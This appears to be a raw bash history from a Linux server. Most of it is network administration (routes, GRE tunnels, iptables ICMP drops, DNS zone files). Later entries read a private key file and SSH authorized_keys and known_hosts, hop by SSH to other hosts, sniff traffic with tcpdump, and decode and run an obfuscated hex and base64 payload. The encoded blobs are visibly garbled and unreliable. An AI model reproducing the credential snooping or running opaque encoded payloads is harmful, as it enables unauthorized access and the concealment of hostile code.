539  cat yytuo.com.db
540  exit
541  ip route
542  mtr 206.72.206.194
543  ip addr
544  cat /etc/sysconfig/network-scripts/route-inter2ll
545  for i in {194..206}; do ip addr del 206.72.206.$i/32 dev eth0; done
546  ip addr
547  for i in {194..206}; do ip addr del 206.72.206.$i/28 dev eth0; done
548  ip addr
549  cat /etc/sysconfig/network-scripts/route-inter2ll
550  ip addr del 66.45.232.99/29 dev eth0
551  ip addr del 66.45.232.102/29 dev eth0
552  ip addr
553  exit
554  cd /var/named
555  ls
556  ll
557  vim /etc/named.conf
558  ip addr
559  ip route
560  vim /etc/named.conf
561  cat citytoobs.com.db
562  ls
563  dig -t any imustpossess.com
564  whois imustpossess.com
565  exit
```

```
566  cd /var/named
567  ls
568  ll
569  ip addr
570  ip route
571  ip route | grep inter2ll
572  ip route | grep inter2ll | sort
573  ping 10.6.201.2
574  ping 10.6.201.1
575  ip link
576  exit
577  ip addr
578  ip route
579  ip addr add 206.72.206.197/32 dev eth0
580  ip addr del 206.72.206.197/32 dev eth0
581  ls
582  ip addr
583  exit
584  cd /etc/sysconfig/network-scripts/
585  ls
586  cat route-inter2ll
587  cp route-inter2ll route-inter2cet
588  vim route-inter2cet
589  ls
590  cp ifcfg-inter2ll ifcfg-inter2cet
591  vim ifcfg-inter2cet
592  ifup inter2cet
593  ip addr
594  ip route
595  ip route | sort
596  ip route del 206.72.206.198 dev inter2ll
597  ip route add 206.72.206.198 dev inter2cet
598  ip addr
599  ip route | sort
600  ping 10.11.201.1
601  ping 10.11.201.2
602  ping 10.11.201.2exit
603  exit
604  ip addr
605  cd /etc/sysconfig/network-scripts/
606  ls
607  cat route-inter2ll
608  exit
609  cd /etc/sysconfig/network-scripts/
610  ls
611  ifdown ifcfg-inter2ll
612  vi ifcfg-inter2ll
613  ifup ifcfg-inter2ll
614  ip ro
615  ip tun
616  service network restart
617  ls
618  cat ifcfg-eth0-range0
```

```
619  cat route-inter2ll
620  ifdown ifcfg-eth0-range0
621  ifdown ifcfg-eth0-range1
622  ip addr show
623  ls
624  cat ifcfg-eth0
625  cp ifcfg-eth0-range0 bakifcfg-eth0-range0
626  cp ifcfg-eth0-range1 bakifcfg-eth0-range1
627  ls
628  rm ifcfg-eth0-range1
629  rm ifcfg-eth0-range0
630  ls
631  service network restart
632  ip addr show
633  ls
634  sysctl -p
635  ip ro
636  ls
637  cat ifcfg-inter2ll
638  cat route-inter2cet
639  cat route-inter2ll
640  ip tun
641  sysctl -p
642  cat /etc/redhat-release
643  cat ifcfg-inter2ll
644  exit
645  cd /etc/sysconfig/network-scripts/
646  ls
647  ip route
648  ip link
649  ip route | grep inter2ll
650  ip addr
651  ifdown inter2ll
652  ip route
653  ip addr del 206.72.206.206/28 dev eth0
654  ip addr add 206.72.206.206/28 dev eth0
655  ip addr del 206.72.206.206/28 dev eth0
656  ip tunnel add inter2ben mode gre local 66.45.232.98 remote 66.165.231.50
657  ip link set inter2ben up
658  ip addr
659  ip addr add dev inter2ben 10.99.99.2/32 peer 10.99.99.1/32
660  ip addr
661  ping 10.99.99.1
662  ping 10.99.99.2
663  ip route add 206.72.206.206/32 dev inter2ben
664  ip tunnel
665  ip route
666  ip link set inter2ben down
667  ip tunnel del inter2ben
668  ip tunnel
669  ip tunnel add inter2ben mode gre local 66.45.232.98 remote 66.165.231.50 ttl 225
670  ip link set inter2ben up
671  ip addr add 10.99.99.2/32 peer 10.99.99.1/32 dev inter2ben
```

```
672  ip route add 206.72.206.206/32 dev inter2ben
673  ip addr
674  ip -4 route
675  lsmod | grep ip_gre
676  modprobe ip_gre
677  sysctl -a
678  cat /etc/sysctl.conf
679  iptables -L -n
680  ip route
681  ip neigh
682  ip tunnel
683  ip route
684  ip addr
685  ifup inter2ll
686  ip tunnel
687  ip addr
688  ping 10.6.201.2
689  ping 10.6.201.1
690  ip route
691  ip tunnel del inter2ben
692  ip route
693  cat route-inter2ll
694  ip route add 206.72.206.206/32 dev inter2ll
695  exit
696  ip tun show
697  ip ro
698  ls
699  ping 10.99.99.1
700  ip ro | grep ben
701  sysctl -p
702  ip addr show
703  ip addr add 206.72.206.206/32 dev eth0
704  ip addr del 206.72.206.206/32 dev eth0
705  sysctl -p
706  ip ro
707  ip tun show
708  service iptables status
709  service iptables stop
710  service iptables start
711  exit
712  ip addr
713  iptables -L -n
714  iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
715  iptables -A OUTPUT -p icmp --icmp-type 5 -j DROP
716  iptables -A OUTPUT -p icmp --icmp-type 8 -j DROP
717  cat /etc/sysconfig/iptables-config
718  iptables -L -n
719  sudo service iptables stop
720  iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
721  sudo service iptables stop
722  cd
723  ls
724  ll
```

```
725  cd tmp
726  ls
727  yum search python 2.7
728  iptables -L -n
729  ip route
730  cd /etc/sysconfig/network-scripts/
731  ls
732  cat route-inter2ll
733  ip addr
734  awk '{print$1}' route-inter2ll | sed 's/\/32$//g'
735  awk '{print$1}' route-inter2ll | sed 's/\/32$//g' | while read -r line; echo ip addr del $line dev eth0; done
736  awk '{print$1}' route-inter2ll | sed 's/\/32$//g' | while read -r line; do echo ip addr del $line dev eth0; done
737  awk '{print$1}' route-inter2ll | sed 's/\/32$//g' | while read -r line; do ip addr del $line dev eth0; done
738  ip addr
739  ip route
740  ls
741  ifdown inter2ll && ifup inter2ll
742  ip route
743  exit
744  cd /root
745  ls -la
746  cd backup
747  ls
748  cd ..
749  cd dns_configs/
750  ls
751  cat add_dmarc.sh
752  ls -la
753  cat dmarc.zone.db
754  cd zones
755  ls
756  ls -la
757  cd ..
758  cd ..
759  ls
760  cd /
761  ls
762  cd admin
763  ls
764  cat rc.local
765  cat stress
766  ls /
767  cd cgroup
768  ls
769  cat ./rc.grsec
770  cat shell.db
771  cd /
772  ls
773  cd /home
774  ls
775  cd /mnt
776  ls
777  cd /dev
```

```
778  ls
779  mount -o ro, /dev/sda5 /mnt
780  mount -o ro, /dev/sda4 /mnt
781  mount -o ro, /dev/sda3 /mnt
782  cd /tmp
783  ls
784  cat ks-script-yKuwhO
785  cd /bar
786  cd /var
787  cat /root/.bash_history
788  ping 10.6.201.1
789  tracepath 10.6.201.1
790  ls
791  cd named
792  ls
793  ls -la
794  cat zeery.com.db
795  cat wellspringdepot.com.db
796  ls
797  cd ..
798  ls
799  cd cvs
800  ls
801  cd ..
802  cd log
803  ls
804  cd ..
805  cd /
806  ls
807  ls -la
808  cd opt
809  ls
810  cd rh
811  ls
812  cd /
813  cd usr
814  ls
815  cd tmp
816  ls
817  cd ..
818  cd local
819  ls
820  cd bin
821  ls
822  cd ..
823  cd sbin
824  ls
825  cd ..
826  cd share
827  ls
828  cd applications
829  ls
830  cd /
```

831  ls
832  cd /dev
833  ls
834  mount -o ro, /dev/sda3 /mnt
835  mount -o ro, /dev/sda2 /mnt
836  mount -o ro, /dev/sda1 /mnt
837  mount -o ro, /dev/ram0 /mnt
838  mount
839  mountallfs
840  mountall-fs
841  mount -a
842  mount
843  cd /sys
844  ls
845  cd hypervisor
846  ls
847  cd ..
848  cd ..
849  cd /proc/sys/fs/binfmt_misc
850  ls
851  cd status
852  cat status
853  cd /dev/shm
854  ls
855  cd /
856  ls
857  cd media
858  ls
859  cd ..
860  echo

'626173653634202D643C3C596D467A5A5459304943316B504477385344527A53554E4D63334A5862474E4251544A6B646C6C C59556E706155554E57624578B31645764365155316F646D4D3461474A6A52464E5052446C4552232A5A775954466E6555524A615 64A4255566C4861544A6A6A4C326C535430551774D57467862576447655337446D4C7A513464455979663030314253300557265586433 55864495A456F7656316C5A53485A5364464E649526C5A54626C35A4B4D56564C4C4C31453359545456706131524E E563078325256647 84D5868534D6C6C55304E555261576B64594D6D6D45344347A6B33513130357945584827B556C68565651653163316158AA4353314A566345 6C725648426426C4D69746164316C355A3146685766E637A53477855545352425425A6C6C677225A5751325555870C59564676546B567156 5767724E4856735447677A5932305361335671655554457456379625556C6853485A7665554A6B563263314E56D786E61555654 54573316D5354524A524642465A473533444E4E36534338315157454997556B474F65566379954305A4956584A5A515444A6162303 568634568445457684C654552775347567655566314D474531556D64366627A51334D4656704D577B4D565668434B433466685 27A684A5646526162236F304D6B6C305955A4B536C4A6C534455A5355315A7A55316F775744553455334E6853573934656546665 B627A4A4D5356525861566B3457545431533345346232784E5A336C486245357153655A494C33466A6A616B6C3456553131536B 4A7253484C325264B4A324E4466536253657556656677B2636B3958645870544D6E6E6A6157686A5A5749334F566C3563446C67661 575685A54870765353393353536D3977613068322536E4D7751316C6E6E4E5932567455335578521566F4D44684C636E6C4E646D2554 52315A6F4F7A68445347707025326F794C79397A4C724943415457A64316C6CD5755644215543949484877675A335675656D6L 77664342336147C735453424A526C4D3949484A6A6C595751674C584A754D534276A4F794267279427763D76A5A4C75644759674A5 74D6749695237597A6F744A43646362696439496A73676332786C655A5841674D43334774D444537949467369476949526A49694264 4948783849484E755735677D494441754D455374947527662605D554B7C6266173680A' | xxd -r -p

861  base64 -d

862  base64 -d

YmFzZTY0IC1kPDw8SDRzSUNMc3JXbGNBQTJkdllYUnpaUUNWbEx1dWd6d6QU1odmM4aGJjRFNPRDlER2ZwYTFneURJaVJBUVlHaTJj
L2lST0QwMWFxbWdGeStmLzQ4dEYyc01BS0UreXd3UXdlZEovV1lZSHZSdFNlRlZEblZKMVVLL1E3YTVpYa1RNV0x2RVdxMXhSMlU0N
URaWkdYMmE4Kzk3Q05yNXBxUlhVU1c1aXZCS1JVcElrVHBlMitad1l5Z1FhWnczSGxUW5BZlgrZWQ2UXplYVFvVkvVqVWgrNHVsTG
gzY205a3VqeUZDWEcybUlhSHZveUJkV2c1NmxnaUVTZW1mSTRJRFBFZG53MDN6SC81WElyUkNOeVcyT0ZlVXJZQTJab05hcEhDT
WhLeERwSGVvUTV1MGE1Umd6bzQ3MFVpMWxxMVVhCK3FhRzhJVFRab3o0Mkl0YUZKSlJlSEZSU1ZzU1owWDU4U3NhSW94VTVk
bzJMSVRXaVk4WTU1S0E4b2xNZ3lHbE5qSVZIL3Fjakl4VU11SkJrSHM2RkJ2NDFSbUhuVVgyRk9XXdpTNnNjaWhjZWI3OVl5cDlvaWh
ZZHpvSS93S3m9wa0h2SnMwQ1lnY2VtU3UxR1VoMDhLcnlNdmRmRTR1ZoNzhDUGprU2oyLy9zLzRCCOUEzd1llWUVBQUE9IHwgZ3Vue
mlwfCB3aGlsZSBJRlM9IHJlYWQgLXJuMSBjOyBkbyBwcmludGYgJWMgliR7Yzot0Jcdcbid9ljsgc2xlZXAgMC4wMDU7IFsgliRjlBdlHx8IH
NsZWVvwIDAuMDU7IGRvbmUK

863  cd /root

864  ls -la

865  ls dns_configs/

866  cat dns_configs/private.key

867  cat ./route-inter2cet

868  ssh admin@66.45.232.99

869  ssh admin@206.72.206.194

870  ls

871  cd backup

872  ls

873  locate xr

874  cd /

875  locate xr

876  cd /usr

877  ls

878  cd tmp

879  ls

880  cd ..

881  cd local

882  ls

883  cd src

884  ls

885  cd ..

886  cd src

887  ls

888  cd /

889  ls

890  cd boot

891  ls

892  cd /

893  cd admin

894  ls

895  ./allips

896  ./sshkeyme

897  cd /root

898  ls

899  cd ./.ssh

900  ls

901  cat authorized_keys2

902  cat authorized_keys

903  ls

904  cd ..

905  cd ./.ssh

906  cat known_hosts
907  ssh admin@66.165.231.123
908  who
909  ping justher
910  cd /
911  ls
912  cd tmp
913  ls
914  cd /
915  ls
916  ssh admin@puppet
917  ssh admin@puppet.campaign.pub
918  exit
919  ls -la
920  cat ./.bash_history
921  cd ~
922  ip tunnel
923  netstat -l
924  who
925  tcpdump -q
926  ifconfig
927  tcpdump -q -i inter2ll
928  ssh -v admin@rev.interserver.net
929  ping rev.interserver.net
930  tcpdump -q -i inter2ll -n
931  ssh -v admin@206.72.206.196
932  tcpdump -q -i inter2cet -n
933  ifconfig
934  tcpdump -q -i eth0:2
935  tcpdump -q -i eth0:2 -n
936  tcpdump -q -i eth0:3 -n
937  tcpdump -q -i eth0:3
938  ls -la
939  cd backup/
940  ls
941  cd ..
942  cd dns_configs/
943  ls
944  cat add_dmarc.sh
945  cd ..
946  cd ./.ssh
947  ls
948  cat authorized_keys
949  cat authorized_keys2
950  cat known_hosts
951  cd /sbin
952  ls
953  fdisk -l
954  mount
955  cd /mnt
956  cd ..
957  mount /dev/sda2 /mnt
958  mount /dev/sda4 /mnt

```
959  mount -t ext4 /dev/sda4 /mnt
960  mount -t ext3 /dev/sda4 /mnt
961  dmesg | tail
962  cd /dev
963  ls
964  fdisk
965  mount /dev/sg0 /mnt
966  mount -t ext4 /dev/sg0 /mnt
967  cd block
968  ls
969  cd /etc
970  ls
971  cat ./rc
972  cd /sbin
973  ls
974  modprobe
975  modprobe --help
976  vgscan
977  pvscan
978  status
979  ps -A
980  cd /usr
981  ls
982  cd bin
983  ls
984  cd ..
985  cd sbin
986  ls
987  cd ..
988  ls
989  cd local
990  ls
991  cd bin
992  ls
993  cd ..
994  cd sbin
995  ls
996  cd ..
997  cd ..
998  cd share
999  ls
1000  exit
1001  last
1002  history
```